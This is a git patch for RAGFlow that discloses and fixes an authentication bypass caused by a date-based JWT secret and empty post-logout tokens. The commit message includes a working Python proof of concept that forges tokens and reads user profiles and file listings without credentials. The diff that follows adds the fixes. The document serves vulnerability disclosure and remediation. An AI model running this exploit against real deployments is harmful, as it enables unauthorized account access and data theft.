From de89b84661eaf7cfc75a9d26fc0a54e1f9a690e2 Mon Sep 17 00:00:00 2001 From: Gecko Security Date: Thu, 5 Jun 2025 05:10:24 +0100 Subject: [PATCH] Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. 
**Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. 
Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty --- api/apps/__init__.py | 13 +++++++++++++ api/apps/user_app.py | 3 ++- api/db/services/user_service.py | 25 +++++++++++++++++++++++++ api/settings.py | 22 +++++++++++++++++++++- 4 files changed, 61 insertions(+), 2 deletions(-) diff --git a/api/apps/__init__.py b/api/apps/__init__.py index 7acef9be5..007e37430 100644 --- a/api/apps/__init__.py +++ b/api/apps/__init__.py @@ -146,10 +146,23 @@ def load_user(web_request): if authorization: try: access_token = str(jwt.loads(authorization)) + + if not access_token or not access_token.strip(): + logging.warning("Authentication attempt with empty access token") + return None + + # Access tokens should be UUIDs (32 hex characters) + if len(access_token.strip()) < 32: + logging.warning(f"Authentication attempt with invalid token format: {len(access_token)} chars") + return None + user = UserService.query( access_token=access_token, status=StatusEnum.VALID.value ) if user: + if not user[0].access_token or not user[0].access_token.strip(): + logging.warning(f"User {user[0].email} has empty access_token in database") + return None return user[0] else: return None diff --git a/api/apps/user_app.py b/api/apps/user_app.py index 597f50971..b8d66ecba 100644 --- a/api/apps/user_app.py +++ b/api/apps/user_app.py @@ -16,6 +16,7 @@ import json import logging import re +import secrets from datetime import datetime from flask import redirect, request, session @@ -465,7 +466,7 @@ def log_out(): schema: type: object """ - current_user.access_token = "" + current_user.access_token = f"INVALID_{secrets.token_hex(16)}" current_user.save() logout_user() return get_json_result(data=True) diff --git a/api/db/services/user_service.py b/api/db/services/user_service.py index 1edd46c10..e8344cb43 100644 --- a/api/db/services/user_service.py +++ b/api/db/services/user_service.py @@ -15,6 +15,7 @@ # 
import hashlib from datetime import datetime +import logging import peewee from werkzeug.security import generate_password_hash, check_password_hash @@ -39,6 +40,30 @@ class UserService(CommonService): """ model = User + @classmethod + @DB.connection_context() + def query(cls, cols=None, reverse=None, order_by=None, **kwargs): + if 'access_token' in kwargs: + access_token = kwargs['access_token'] + + # Reject empty, None, or whitespace-only access tokens + if not access_token or not str(access_token).strip(): + logging.warning("UserService.query: Rejecting empty access_token query") + return cls.model.select().where(cls.model.id == "INVALID_EMPTY_TOKEN") # Returns empty result + + # Reject tokens that are too short (should be UUID, 32+ chars) + if len(str(access_token).strip()) < 32: + logging.warning(f"UserService.query: Rejecting short access_token query: {len(str(access_token))} chars") + return cls.model.select().where(cls.model.id == "INVALID_SHORT_TOKEN") # Returns empty result + + # Reject tokens that start with "INVALID_" (from logout) + if str(access_token).startswith("INVALID_"): + logging.warning("UserService.query: Rejecting invalidated access_token") + return cls.model.select().where(cls.model.id == "INVALID_LOGOUT_TOKEN") # Returns empty result + + # Call parent query method for valid requests + return super().query(cols=cols, reverse=reverse, order_by=order_by, **kwargs) + @classmethod @DB.connection_context() def filter_by_id(cls, user_id): diff --git a/api/settings.py b/api/settings.py index 2d743f904..22e9d03f4 100644 --- a/api/settings.py +++ b/api/settings.py @@ -15,6 +15,7 @@ # import json import os +import secrets from datetime import date from enum import Enum, IntEnum @@ -73,6 +74,25 @@ SANDBOX_HOST = None BUILTIN_EMBEDDING_MODELS = ["BAAI/bge-large-zh-v1.5@BAAI", "maidalun1020/bce-embedding-base_v1@Youdao"] +def get_or_create_secret_key(): + secret_key = os.environ.get("RAGFLOW_SECRET_KEY") + if secret_key and len(secret_key) >= 32: + 
return secret_key + + # Check if there's a configured secret key + configured_key = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("secret_key") + if configured_key and configured_key != str(date.today()) and len(configured_key) >= 32: + return configured_key + + # Generate a fresh random key and warn about it; never write the key itself to the logs + import logging + new_key = secrets.token_hex(32) + logging.warning( + "SECURITY WARNING: Using auto-generated SECRET_KEY. " + "Sessions will not survive a restart; set RAGFLOW_SECRET_KEY (32+ characters) to persist them." + ) + return new_key + def init_settings(): global LLM, LLM_FACTORY, LLM_BASE_URL, LIGHTEN, DATABASE_TYPE, DATABASE, FACTORY_LLM_INFOS, REGISTER_ENABLED @@ -121,7 +141,7 @@ def init_settings(): HOST_IP = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("host", "127.0.0.1") HOST_PORT = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("http_port") - SECRET_KEY = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("secret_key", str(date.today())) + SECRET_KEY = get_or_create_secret_key() global AUTHENTICATION_CONF, CLIENT_AUTHENTICATION, HTTP_APP_KEY, GITHUB_OAUTH, FEISHU_OAUTH, OAUTH_CONFIG # authentication